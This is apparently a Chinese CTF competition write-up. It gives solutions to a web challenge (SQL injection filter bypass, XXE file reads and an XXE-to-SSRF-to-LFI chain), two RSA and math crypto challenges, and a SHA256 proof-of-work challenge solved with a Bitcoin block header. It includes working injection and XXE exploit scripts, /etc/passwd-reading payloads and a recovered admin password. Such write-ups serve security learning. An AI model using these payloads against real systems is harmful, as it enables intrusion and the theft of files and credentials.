web#

HelloCms#

1. 信息收集与 SQL 注入 (Login Bypass)

访问目标网站 http://120.79.131.78:38888/，发现是一个 CMS 系统。尝试访问 login.php，发现存在登录页面。

经过测试，登录处的 username 参数存在 SQL 注入漏洞，但存在关键字过滤。

过滤器分析

后端代码逻辑类似于：

1
$id = preg_replace('/or/i', "", $id);
2
$id = preg_replace('/and/i', "", $id);
3
$id = preg_replace('/select/i', "", $id);

这意味着 or, and, select 等关键字会被替换为空。

绕过方法

我们可以利用双写绕过过滤器：

OR -> OORR (中间的 OR 被删掉后，两边的 O and R 拼在一起)
AND -> AANDND
SELECT -> SELSELECTECT

通过布尔盲注或联合查询注入，可以获取数据库信息。最终我们通过注入绕过登录验证，或者直接使用爆破/注入出的管理员密码：kingdom123ABC。

登录后，跳转到 write.php。

2. XXE 漏洞挖掘

在 write.php 页面，我们发现可以提交内容。通过抓包发现，提交的数据会被 XML 解析器处理。

读取 write.php 源码（利用后续发现的漏洞确认）或通过报错推测，后端代码使用了 DOMDocument::loadXML 且未禁用外部实体引用 (LIBXML_NOENT)。

1
$dom = new DOMDocument;
2
$dom->loadXML($_POST['content'], LIBXML_NOENT);

这导致了 XXE (XML External Entity) 漏洞。我们可以构造 Payload 读取服务器本地文件。

Payload 示例 (读取 /etc/passwd):

1
<!DOCTYPE root [
2
<!ENTITY x SYSTEM "file:///etc/passwd">
3
]>
4
<root>&x;</root>

3. 内网探测 (SSRF)

由于我们无法直接读取到 Flag（尝试 /flag 失败），我们需要探测内网。通过读取 /proc/net/arp 文件，获取内网 ARP 表信息。

Payload:

1
<!DOCTYPE root [
2
<!ENTITY x SYSTEM "file:///proc/net/arp">
3
]>
4
<root>&x;</root>

结果: 发现内网 IP 172.17.0.3。

接着，利用 XXE 进行 SSRF (Server-Side Request Forgery) 探测该 IP 的 80 端口。

Payload:

1
<!DOCTYPE root [
2
<!ENTITY x SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.17.0.3/">
3
]>
4
<root>&x;</root>

(这里使用了 php://filter base64 编码来避免返回内容破坏 XML 结构)

成功访问到 http://172.17.0.3/，发现是一个 Web 服务。

4. 内网 LFI 漏洞利用

进一步探测 http://172.17.0.3/index.php，并读取其源码。

内网 index.php 源码逻辑:

1
<?php
2
    error_reporting(0);
3
    include "flag.php";
4
    $file = $_GET['file'];
5
    // 过滤器
6
    if(strstr($file,"../") || stristr($file, "tp") || stristr($file,"input") || stristr($file,"data")) {
7
        echo "Oh no!";
8
        exit();
9
    }
10
    include($file);
11
?>

发现存在本地文件包含 (LFI) 漏洞，参数为 file。过滤器拦截了：

../ (路径穿越)
tp (拦截 http, ftp 等 wrapper)
input, data (拦截 php://input, data://)

但未拦截 php://filter。

5. 组合攻击 (Chain Exploit)

我们的目标是读取内网服务器上的 flag.php。

攻击链路:

外部 XXE: 攻击者向 write.php 发送 XML Payload。
SSRF: write.php 解析 XML，向内网 http://172.17.0.3/index.php 发起请求。
内网 LFI: 请求中包含 file 参数，利用 php://filter 读取 flag.php。

构造 Payload: 内网请求 URL: http://172.17.0.3/index.php?file=php://filter/read=convert.base64-encode/resource=flag.php

注意：URL 中的 php:// 不包含 tp，所以能绕过内网的过滤器。

最终 XML Payload:

1
<!DOCTYPE root [
2
<!ENTITY x SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.17.0.3/index.php?file=php://filter/read=convert.base64-encode/resource=flag.php">
3
]>
4
<root>&x;</root>

6. 获取 Flag

发送上述 Payload 后，服务器返回了两层 Base64 编码的数据：

第一层是 write.php 响应的 Base64（由外部 XXE 的 php://filter 产生）。
解码第一层后，得到内网 index.php 的响应内容，其中包含 flag.php 源码的 Base64（由内网 LFI 的 php://filter 产生）。

解码内层 Base64，得到 flag.php 源码：

1
<?php
2
//echo "flag{50f84daf3a6dfd6a9f20c9f8ef428942}";
3
?>

sql盲注脚本

1
import requests
2
import re
3
import time
4
import sys
5

6
url = "http://120.79.131.78:38888/login.php"
7

8
def encode_payload(payload):
9
    def replace_callback(match):
10
        s = match.group(0)
11
        if s.lower() == 'or': return s[0] + s + s[1]
12
        elif s.lower() == 'and': return s[0] + s + s[1:]
13
        elif s.lower() == 'select': return s[0:3] + s + s[3:]
14
        return s
15
    pattern = re.compile(r"(or|and|select)", re.IGNORECASE)
16
    return pattern.sub(replace_callback, payload)
17

18
def check(payload):
19
    encoded_payload = encode_payload(payload)
20
    data = {"username": encoded_payload, "password": "123"}
21
    while True:
22
        try:
23
            response = requests.post(url, data=data, timeout=10)
24
            if "maybe password error!" in response.text:
25
                return False
26
            else:
27
                return True
28
        except Exception as e:
29
            print(f"Error: {e}. Retrying...")
30
            time.sleep(2)
31

32
def binary_search(template, min_val, max_val):
33
    low = min_val
34
    high = max_val
35
    while low <= high:
36
        mid = (low + high) // 2
37
        # Check if value > mid
38
        if check(template.format(op=">", val=mid)):
39
            low = mid + 1
40
        else:
41
            high = mid - 1
42
    return low
43

44
if __name__ == "__main__":
45
    print("Finding password length...")
46
    length = 13
47
    print(f"Password length: {length}")
48

49
    print("Dumping password...")
50
    password = "kingd"
51
    sys.stdout.write(password)
52
    sys.stdout.flush()
53

54
    for i in range(6, length + 1):
55
        char_code = binary_search(f"admin' AND CONV(HEX(MID(password,{i},1)), 16, 10) {{op}} {{val}}#", 32, 126)
56
        char = chr(char_code)
57
        password += char
58
        sys.stdout.write(char)
59
        sys.stdout.flush()
60
    print(f"\nPassword: {password}")

xxe脚本

1
import requests
2
import re
3
import base64
4

5
url = "http://120.79.131.78:38888/write.php"
6
cookies = {"PHPSESSID": "你的SESSION_ID"} # 需先登录获取
7

8
def exploit():
9
    # 目标: 利用 XXE -> SSRF -> LFI 读取内网 flag.php
10
    # 内网 LFI Payload: php://filter/read=convert.base64-encode/resource=flag.php
11
    internal_url = "http://172.17.0.3/index.php?file=php://filter/read=convert.base64-encode/resource=flag.php"
12

13
    # 外部 XXE Payload
14
    xml_payload = f"""<!DOCTYPE root [
15
    <!ENTITY x SYSTEM "php://filter/read=convert.base64-encode/resource={internal_url}">
16
    ]>
17
    <root>&x;</root>"""
18

19
    data = {"content": xml_payload}
20

21
    print(f"[*] Sending payload targeting: {internal_url}")
22
    r = requests.post(url, cookies=cookies, data=data)
23

24
    # 提取外层 Base64
25
    match = re.search(r'<root>(.*?)</root>', r.text, re.DOTALL)
26
    if match:
27
        outer_b64 = match.group(1)
28
        try:
29
            # 第一层解码
30
            inner_content = base64.b64decode(outer_b64).decode('utf-8')
31
            print("[+] Outer decode successful.")
32

33
            # 提取并进行第二层解码 (去除可能存在的空白字符)
34
            inner_b64 = inner_content.strip()
35
            flag_source = base64.b64decode(inner_b64).decode('utf-8')
36

37
            print("[+] Flag Source found:")
38
            print(flag_source)
39
        except Exception as e:
40
            print(f"[-] Error decoding: {e}")
41
    else:
42
        print("[-] No content found.")
43

44
if __name__ == "__main__":
45
    exploit()

crypto#

common rsa#

共模攻击

1
import gmpy2
2
from Crypto.Util.number import long_to_bytes
3

4
N =
5
e1 =
6
c1 =
7
e2 =
8
c2 =
9

10
def common_modulus_attack(n, e1, c1, e2, c2):
11
    gcd, s1, s2 = gmpy2.gcdext(e1, e2)
12
    if gcd != 1:
13
        print("Error: e1 and e2 are not coprime. GCD is", gcd)
14
        return None
15
    m = (gmpy2.powmod(c1, s1, n) * gmpy2.powmod(c2, s2, n)) % n
16
    return int(m)
17

18
m_int = common_modulus_attack(N, e1, c1, e2, c2)
19
if m_int:
20
    try:
21
        flag = long_to_bytes(m_int)
22
        print("Recovered Flag:", flag.decode())
23
    except Exception as e:
24
        print("Error decoding flag:", e)
25
        print("Raw integer:", m_int)

sol#

关键代码

1
from Crypto.Util.number import *
2
import hashlib
3

4
p,x,a,b,c=getPrime(2025), getPrime(1024),getPrime(512),getPrime(1024),getPrime(1500)
5
y=x**4+a*x**2+b*x+c
6
print(f"y={y}")
7
print(f"b={b}")
8
print(f"c={c}")
9
print(f"p={p}")
10
flag=b'flag{'+hashlib.md5((str(a)).encode()).hexdigest().encode()+b'}'

已知信息：

$p$ : 2025 位质数（在本题逻辑中似乎未直接用到，可能是干扰项或作为模数背景）
$y$ : 计算结果，数值很大
$b$ : 1024 位质数
$c$ : 1500 位质数
$y = x^4 + a \cdot x^2 + b \cdot x + c$

未知信息：

$x$ : 1024 位质数
$a$ : 512 位质数

目标：

求解 $a$ ，计算其 MD5 值作为 flag。

我们需要观察方程中各项的数量级大小：

$x \approx 2^{1024}$ ，则 $x^4 \approx (2^{1024})^4 = 2^{4096}$
$a \approx 2^{512}$ ，则 $a \cdot x^2 \approx 2^{512} \cdot (2^{1024})^2 = 2^{512 + 2048} = 2^{2560}$
$b \approx 2^{1024}$ ，则 $b \cdot x \approx 2^{1024} \cdot 2^{1024} = 2^{2048}$
$c \approx 2^{1500}$

关键发现： 最高次项 $x^4$ 的数量级 ( $2^{4096}$ ) 远远大于其他所有项之和。 $a \cdot x^2 + b \cdot x + c \approx 2^{2560}$ ，这相对于 $x^4$ 来说非常小。因此，我们可以通过对 $y$ 开四次方根来近似求解 $x$ 。 $y \approx x^4 \implies x \approx \sqrt[4]{y}$ 更精确地，考虑到 $c$ 是常数项，我们可以先减去 $c$ ： $Y = y - c = x^4 + a \cdot x^2 + b \cdot x$ 由于 $x$ 是整数，我们可以直接计算整数四次方根： $x = \text{isqrt}(\text{isqrt}(Y))$ 求出 $x$ 后，我们可以逐步剥离方程求解 $a$ ：

计算 $Y - x^4$ ： $Y - x^4 = a \cdot x^2 + b \cdot x = x \cdot (a \cdot x + b)$
除以 $x$ ： $\frac{Y - x^4}{x} = a \cdot x + b$ 记 $Z = (Y - x^4) // x$
求解 $a$ ： $Z = a \cdot x + b \implies a = \frac{Z - b}{x}$

Exp

1
import hashlib
2
import math
3

4
y =
5
b =
6
c =
7

8
Y = y - c
9
x = math.isqrt(math.isqrt(Y))
10
print(f"Calculated x (approx): {x}")
11

12
# 2. 验证并求解 a
13
# Y - x^4 = a*x^2 + b*x
14
# 提取因子 x: Y - x^4 = x * (a*x + b)
15
term1 = Y - x**4
16
if term1 % x == 0:
17
    # temp = a*x + b
18
    temp = term1 // x
19

20
    # temp - b = a*x
21
    if (temp - b) % x == 0:
22
        a = (temp - b) // x
23
        print(f"Found a: {a}")
24

25
        # 计算 Flag
26
        flag_hash = hashlib.md5(str(a).encode()).hexdigest()
27
        flag = f"flag{{{flag_hash}}}"
28
        print(f"Flag: {flag}")
29
    else:
30
        print("Error: (temp - b) not divisible by x")
31
else:
32
    print("Error: (Y - x^4) not divisible by x")

work#

题目描述 题目要求输入一个 data，使得 SHA256(data) 的结果以 20 个 0 结尾（十六进制表示）。错误提示：“No enough trailing zeros in your SHA256!” 题目描述中提到 “就算你有超级计算机你也跑不出来的”，并给出了类似 Bitcoin 创世块哈希的提示。

1. 暴力破解不可行 要求 20 个十六进制 0，即 $16^{20}$ 次尝试，这在计算上是不可能通过普通暴力破解完成的。这暗示我们需要利用现有的、已经经过大量算力计算的结果。

2. 比特币挖矿原理 比特币挖矿的过程就是寻找一个区块头（Block Header），使得其双重 SHA256 哈希值满足一定的难度目标（即小于某个特定的数值）。比特币的哈希算法是：Block_Hash = SHA256(SHA256(Block_Header))

在比特币浏览器（如 Blockchain.com）上，区块哈希通常以 大端序（Big-Endian） 显示，看起来像这样： 000000000000000000002db501835dd1ea3faea87ee8feb42a304c2c44a8e7fc 可以看到它以大量的 0 开头。

3. 字节序的转换 关键点在于：比特币协议内部以及标准 SHA256 算法产生的字节流，与浏览器显示的十六进制字符串是 字节反序 的关系。

浏览器显示 (ID): 00 00 ... 00 2d b5 ... (Leading Zeros)
实际内存/SHA256结果: ... b5 2d 00 ... 00 00 (Trailing Zeros!)

这意味着，任何一个在浏览器上显示拥有 20 个 前导零 的比特币区块，其真实的 SHA256 哈希字节流都拥有 20 个 后尾零。

4. 构造 Payload 服务端执行的检查是 SHA256(data)。我们需要 SHA256(data) 结尾为 20 个 0。已知比特币区块满足：SHA256(SHA256(Block_Header)) 结尾为 20 个 0（在字节流层面）。因此，如果我们让 data = SHA256(Block_Header)，那么服务端计算的 SHA256(data) 就等于比特币的区块哈希，从而满足条件。

我们称 SHA256(Block_Header) 为 Midstate（中间状态）。

5. 实施步骤

选取区块: 找到一个难度足够高的比特币区块（前导零超过 20 个）。例如区块高度 924457。
获取区块头信息:
- Version: 1040187392
- Prev Hash: 000000000000000000015d733e8cb8b1ee5388de1cc0ed13fb4628ccbdcd08af
- Merkle Root: 57afe432455f6800b001fec53eb1ab58e68d69ef837683635b17b0e7a38a0e96
- Time: 1763664997
- Bits: 1701d936
- Nonce: 1627458621
重构区块头: 按照比特币协议（Little-Endian）将上述字段拼接成 80 字节的二进制数据。
计算 Midstate: 对区块头进行一次 SHA256。
提交 Payload: 将 Midstate 进行 Base64 编码提交给服务器。

Exp

1
import hashlib
2
import struct
3
import binascii
4
import base64
5
import requests
6

7
# 目标区块: 924457
8
# 浏览器显示 Hash: 000000000000000000002db501835dd1ea3faea87ee8feb42a304c2c44a8e7fc
9

10
# 1. 构造区块头 (注意字节序转换)
11
version = 1040187392
12
prev_hash = "000000000000000000015d733e8cb8b1ee5388de1cc0ed13fb4628ccbdcd08af"
13
merkle_root = "57afe432455f6800b001fec53eb1ab58e68d69ef837683635b17b0e7a38a0e96"
14
time_val = 1763664997
15
bits = "1701d936"
16
nonce = 1627458621
17

18
header = b""
19
header += struct.pack("<I", version)
20
header += binascii.unhexlify(prev_hash)[::-1]
21
header += binascii.unhexlify(merkle_root)[::-1]
22
header += struct.pack("<I", time_val)
23
header += binascii.unhexlify(bits)[::-1]
24
header += struct.pack("<I", nonce)
25

26
# 2. 计算 Payload (Midstate)
27
# data = SHA256(Header)
28
midstate = hashlib.sha256(header).digest()
29

30
# 3. 发送请求
31
# 服务端将计算 SHA256(data) -> 即 Block Hash (Little Endian Bytes) -> 结尾全是0
32
payload_b64 = base64.b64encode(midstate).decode()
33
print(f"Payload: {payload_b64}")
34

35
url = "http://47.107.165.153:45552/"
36
r = requests.get(url, params={"data": payload_b64})
37
print(r.text)